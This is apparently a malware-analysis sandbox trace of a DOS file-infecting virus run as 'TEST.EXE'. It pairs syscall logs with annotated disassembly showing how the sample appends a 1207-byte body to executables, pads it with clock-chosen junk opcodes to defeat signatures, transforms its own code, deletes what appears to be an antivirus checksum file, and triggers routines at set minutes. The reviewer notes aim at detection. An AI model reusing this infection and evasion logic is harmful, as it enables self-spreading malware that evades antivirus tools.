2018-12-25T12:23:33.020068527Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.022010349Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.023959753Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.026506255Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.029181639Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.031611316Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.034277578Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.036278821Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.038230911Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.040533582Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.042450237Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.04453058Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.047038258Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.048985088Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.051909328Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.054785472Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.057074629Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.059919259Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.061971333Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.064032475Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.066551891Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.068735221Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.071209918Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.074264324Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.076945859Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.07946393Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.0831915Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.08533908Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.087627965Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.090770826Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.093407433Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.095739925Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.098346399Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.101748511Z 76 PC: 15150 | Terminate with return code (Return code = '200')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":50,"Second":0,"TimeBased":true,"OriginalID":9667,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:30.275118292Z 25 PC: 15198 | Get default drive
2018-12-25T12:23:30.276762239Z 71 PC: 151a7 | Get current directory
2018-12-25T12:23:30.279513987Z 26 PC: 153fd | Set disk transfer address
2018-12-25T12:23:30.280467989Z 78 PC: 15408 | Find first file
2018-12-25T12:23:30.286661102Z 67 PC: 1542b | Get or set file attributes
2018-12-25T12:23:30.292430414Z 67 PC: 15433 | Get or set file attributes
2018-12-25T12:23:31.23105339Z 61 PC: 15438 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:23:31.243418753Z 87 PC: 1543e | Get or set file date and time
2018-12-25T12:23:31.245078357Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:23:31.252071456Z 66 PC: 154a6 | Move file pointer
; Disassembly window at the return address of the Get time call logged on this row: two 8-iteration loops that fill a buffer at bp+0x556 with one-byte opcodes selected by clock bits.
2018-12-25T12:23:31.254302359Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8 ; loop counter: 8 bytes generated in the first loop
0x1550e: lea di, word ptr [bp + 0x555] ; di is incremented before the first store, so the first byte lands at bp+0x556
0x15512: inc di
0x15513: shl dx, 1 ; move the top bit of dx into CF; dx is presumably the Get time result (DH=seconds, DL=hundredths in the DOS API) - confirm
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8 ; CF clear: low byte 0xf8 is the CLC opcode; the zero high byte is overwritten by the next iteration's store
0x1551b: jmp 0x15522
0x1551d: nop ; filler after the short jmp; not a branch target in this window
0x1551e: mov word ptr [di], 0xfc ; CF set: 0xfc is the CLD opcode
0x15522: loop 0x15512
0x15524: mov ah, 0x2c ; DOS function 2Ch (Get time): fresh clock bits for the second loop
0x15526: int 0x21
0x15528: mov cx, 8 ; second loop: 8 more bytes, di is not reloaded so they follow the first 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90 ; CF clear: 0x90 is the NOP opcode
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5 ; CF set: 0xf5 is the CMC opcode; window ends before the loop instruction at 0x1553b
; NOTE(review): the generated bytes are harmless single-byte opcodes chosen by the clock, so they look like variable junk; a fixed byte signature anchored on this buffer would not be stable across infections - confirm against a second sample.
; Disassembly window at the return address of the second Get time call: finishes the second junk-byte loop, then writes a clock-dependent number of those bytes to the open file.
2018-12-25T12:23:31.256988104Z 44 PC: 15528 | Get time 0x15528: mov cx, 8 ; 8 iterations, one generated byte each
0x1552b: inc di ; di carries over from code before this window; not reloaded here
0x1552c: shl dx, 1 ; top bit of dx (presumably the Get time result - confirm) selects the byte
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90 ; CF clear: NOP opcode
0x15534: jmp 0x1553b
0x15536: nop ; filler after the short jmp; not a branch target in this window
0x15537: mov word ptr [di], 0xf5 ; CF set: CMC opcode
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c ; DOS function 2Ch (Get time)
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf ; cx = dl & 0x0f, i.e. a length of 0..15 taken from the clock
0x15548: mov ah, 0x40 ; DOS function 40h (Write file or device); handle register is set outside this window
0x1554a: lea dx, word ptr [bp + 0x556] ; source buffer = the generated bytes
0x1554e: int 0x21
0x15550: jmp 0x15555 ; skips the three bytes at 0x15552-0x15554
0x15552: nop ; skipped by the jmp above; presumably filler or data, not executed code
0x15553: add byte ptr [bx + si], al ; decode of two zero bytes that the jmp skips; likely a data word - confirm
; Disassembly window at the return address of the third Get time call: variable-length prefix write, then the fixed 0x4b7-byte body write bracketed by a helper call.
2018-12-25T12:23:31.25945431Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf ; cx = dl & 0x0f: 0..15 bytes; the following log row records 6 bytes for this run
0x15548: mov ah, 0x40 ; DOS function 40h (Write file or device)
0x1554a: lea dx, word ptr [bp + 0x556] ; buffer at bp+0x556
0x1554e: int 0x21
0x15550: jmp 0x15555 ; skips three bytes that the linear disassembler still decodes below
0x15552: nop
0x15553: add byte ptr [bx + si], al ; two zero bytes skipped by the jmp; likely a data word, not code - confirm
0x15555: mov ah, 0x2c ; DOS function 2Ch (Get time)
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx ; clock value stored inside the bp+0x10 .. bp+0x10+0x4b7 range that is written below; presumably a per-infection key or seed - confirm
0x1555e: call 0x2514a ; target as printed is 0x10000 above this code; presumably a 16-bit wrap artifact of the disassembler - confirm
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7 ; 0x4b7 = 1207 bytes, matching the "Write 1207 bytes" row in this trace
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c ; another Get time; its result feeds the trailing write that starts past this window
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-25T12:23:31.262675331Z 64 PC: 15550 | Write file or device (Write 6 bytes on handle 5)
; Disassembly window at the return address of the fourth Get time call: body write, variable-length trailing write, then a seek to end of file. This snapshot shows the bytes at 0x1557e as readable code.
2018-12-25T12:23:31.297156533Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx ; store the clock value inside the region written below; presumably a key or seed - confirm
0x1555e: call 0x2514a ; helper runs before the body is written; address as printed is presumably a 16-bit wrap artifact - confirm
0x15561: mov ah, 0x40 ; DOS function 40h (Write file or device)
0x15563: mov cx, 0x4b7 ; 1207 bytes
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c ; DOS function 2Ch (Get time)
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f ; cx = dl & 0x3f: 0..63 trailing bytes; this trace logs 28
0x15577: mov ah, 0x40 ; dx is not reloaded, so the source pointer is the raw clock value: the trailing bytes are whatever memory sits at ds:dx
0x15579: int 0x21
0x1557b: call 0x2514a ; same helper again after the writes; presumably undoes the earlier transform - confirm
0x1557e: mov ax, 0x4202 ; DOS function 42h, AL=02: move file pointer relative to end of file
0x15581: xor cx, cx
0x15583: xor dx, dx ; offset 0 from end
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9 ; shift count 9 (512-byte units); presumably for the EXE header page count - confirm
; NOTE(review): total growth per file is 1207 bytes plus 0..15 and 0..63 clock-dependent bytes, so a fixed size delta is not a reliable infection indicator.
2018-12-25T12:23:31.300363095Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
; Disassembly window at the return address of the fifth Get time call, taken after the first call 0x2514a has run: the bytes from 0x1557e no longer decode as the seek sequence shown in the snapshot at PC 15559.
2018-12-25T12:23:31.322219719Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f ; 0..63 trailing bytes; the following log row records 28
0x15577: mov ah, 0x40 ; DOS function 40h (Write file or device); dx still holds the clock value
0x15579: int 0x21
0x1557b: call 0x2514a ; the later "Move file pointer" row at PC 15587 shows readable code runs after this call; presumably it restores the bytes below - confirm
0x1557e: scasb al, byte ptr es:[di] ; from here on: linear decode of transformed bytes, not instructions that execute in this form
0x1557f: add byte ptr [si + 0x31], dl
0x15582: fbstp dword ptr [bx + di]
; NOTE(review): the on-disk body is presumably written in this transformed state, so static signatures should target the code before 0x1557e that stays readable - confirm.
2018-12-25T12:23:31.326192561Z 64 PC: 1557b | Write file or device (Write 28 bytes on handle 5)
2018-12-25T12:23:31.32919515Z 66 PC: 15587 | Move file pointer
2018-12-25T12:23:31.330753431Z 66 PC: 155a8 | Move file pointer
2018-12-25T12:23:31.333408844Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-25T12:23:31.336416284Z 67 PC: 15345 | Get or set file attributes
2018-12-25T12:23:31.344651442Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-25T12:23:31.351830014Z 87 PC: 155cc | Get or set file date and time
2018-12-25T12:23:31.354257914Z 62 PC: 155d0 | Close file
2018-12-25T12:23:31.361769441Z 67 PC: 155da | Get or set file attributes
2018-12-25T12:23:31.371180512Z 79 PC: 1541f | Find next file
2018-12-25T12:23:31.372879518Z 59 PC: 152c0 | Change current directory
2018-12-25T12:23:31.378762812Z 14 PC: 151d5 | Set default drive (Drive = 'C')
2018-12-25T12:23:31.382217254Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:31.383210872Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:31.386854769Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:31.391021827Z 59 PC: 151e0 | Change current directory
2018-12-25T12:23:31.394783944Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:31.395679427Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:31.404687786Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:31.409643274Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.046519713Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.054404529Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.056512759Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.062244749Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.06420178Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.067878356Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.07046629Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.072509287Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.077020908Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.08001551Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.086521783Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.088782639Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.091103052Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.092224237Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.093922171Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.095998079Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.102680255Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.108079162Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.109660712Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.114544963Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.124727564Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.129135432Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.139671861Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.151522012Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.158369989Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.16004152Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.166862871Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.168391767Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.170550413Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.178694987Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.180901551Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.187047761Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.190046751Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.496983932Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.499430589Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.503754215Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.505880899Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.507644438Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.511538871Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.517799646Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.525112806Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.528126399Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.535276247Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.544938208Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.549827448Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.555868972Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.565625875Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.573257514Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.574986445Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.58076506Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.583205804Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.58548836Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.587777389Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.5911654Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.597170917Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.599660094Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.608761928Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.610947042Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.613758973Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.615794435Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.617175213Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.619809788Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.626010669Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.631905597Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.633658406Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.64081405Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.650858895Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.654048216Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.66068412Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.670442625Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.676814979Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.678189794Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.68381676Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.685217686Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.687440451Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.69031813Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.692742369Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.698761726Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.702410773Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.710018067Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.71206994Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.71891566Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.720147173Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.72130132Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.725208094Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.731406949Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.737254281Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.740103668Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.747295469Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.756716544Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.760506347Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.766403927Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.775699136Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.783223786Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.784775496Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.790946002Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.793604555Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.79590615Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.798124363Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.801321899Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.807270412Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.809564738Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.817349667Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.819388969Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.83197715Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.834412475Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.83567125Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.841682662Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.84775913Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.855755746Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.857959657Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.870211646Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.879526955Z 14 PC: 151e9 | Set default drive (Drive = 'D')
2018-12-25T12:23:32.880824701Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.885469796Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.889502421Z 14 PC: 151f2 | Set default drive (Drive = 'E')
2018-12-25T12:23:32.890694666Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.894893647Z 14 PC: 15218 | Set default drive (Drive = 'A')
2018-12-25T12:23:32.89610253Z 59 PC: 15220 | Change current directory
; Disassembly window at the return address of a Get time call: a chain of comparisons on cl (minutes in the DOS Get time result) that dispatches to different routines at specific minute values.
2018-12-25T12:23:32.904252274Z 44 PC: 1523c | Get time 0x1523c: cmp cl, 5 ; minute == 5
0x1523f: jne 0x15244
0x15241: call 0x1534a
0x15244: cmp cl, 0xd ; minute == 13
0x15247: jne 0x1524c
0x15249: call 0x15359
0x1524c: cmp cl, 0x1e ; minute == 30
0x1524f: jne 0x15258
0x15251: lea dx, word ptr [bp + 0x290] ; argument for the routine at 0x15330; contents not visible here
0x15255: call 0x15330
0x15258: cmp cl, 0x28 ; minute == 40, same argument as the minute-30 case
0x1525b: jne 0x15264
0x1525d: lea dx, word ptr [bp + 0x290]
0x15261: call 0x15330
0x15264: cmp cl, 0x32 ; minute == 50, different argument (bp+0x2c7)
0x15267: jne 0x15270
0x15269: lea dx, word ptr [bp + 0x2c7]
0x1526d: call 0x15330 ; the Find first file / Get or set file attributes / Delete file rows that follow have PCs 15337-15349, i.e. inside this routine
0x15270: lea si, word ptr [bp + 0x195]
0x15274: lea di, word ptr [bp + 0x18d]
; NOTE(review): the metadata row before this trace has "TimeBased":true and "Min":50, presumably the emulated clock; that matches the minute-50 branch firing in this run - confirm. Other minute values need their own runs to observe the remaining branches.
2018-12-25T12:23:32.912703877Z 78 PC: 15337 | Find first file
2018-12-25T12:23:32.921395756Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.931190504Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.966506341Z 53 PC: 14fba | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:32.968371121Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.969768816Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.971313022Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.972720415Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.973811645Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.975512982Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.976552109Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.977611135Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.97882826Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.979893136Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.980835082Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.982129324Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.983072206Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.983987931Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.985328333Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.986509382Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.987667264Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.989319815Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.990501359Z 37 PC: 14fcf | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:32.99143431Z 37 PC: 14fd7 | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:23:32.992640286Z 37 PC: 14fdf | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:23:32.993806204Z 37 PC: 14fe7 | Set interrupt vector (Interrupt = '63' AKA 'Read file or device')
2018-12-25T12:23:32.995139732Z 68 PC: 15eab | I/O control for devices (Set for = '� ��O�Э:E�t��ҭ3ɬ� �u��ŝ]_^ZY[�P�/��t�\�ЭXâЭX�SQRWV�������6έ�6̭�6ʭ2ɬ �t:�t��t�����2ɪ���6έ��3����t!�Э �u:E�t��� �u�����}��')
2018-12-25T12:23:33.133430016Z 64 PC: 1563b | Write file or device (Write 0 bytes on handle 1)
2018-12-25T12:23:33.135154238Z 37 PC: 15111 | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:33.136236539Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.138071094Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.139158178Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.140279119Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.142330171Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.143387581Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.144419104Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.146404028Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.147445761Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.148473439Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.150429467Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.151471624Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.152492569Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.154431393Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.155469245Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.156484259Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.158443545Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.159468144Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.160430766Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.16283552Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.164746028Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.166636673Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.168744081Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.170600484Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.172366682Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.174794888Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.17657552Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.178344927Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.181142304Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.183012006Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.184777423Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.187758975Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.189538883Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.191509237Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.193906921Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.195975841Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.198371705Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.200773501Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.20274649Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.20601581Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.208441153Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.210977614Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.213547314Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.215585868Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.217417685Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.220266539Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.22218268Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.224096385Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.226557693Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.228549618Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.230637936Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.235219593Z 76 PC: 15150 | Terminate with return code (Return code = '200')

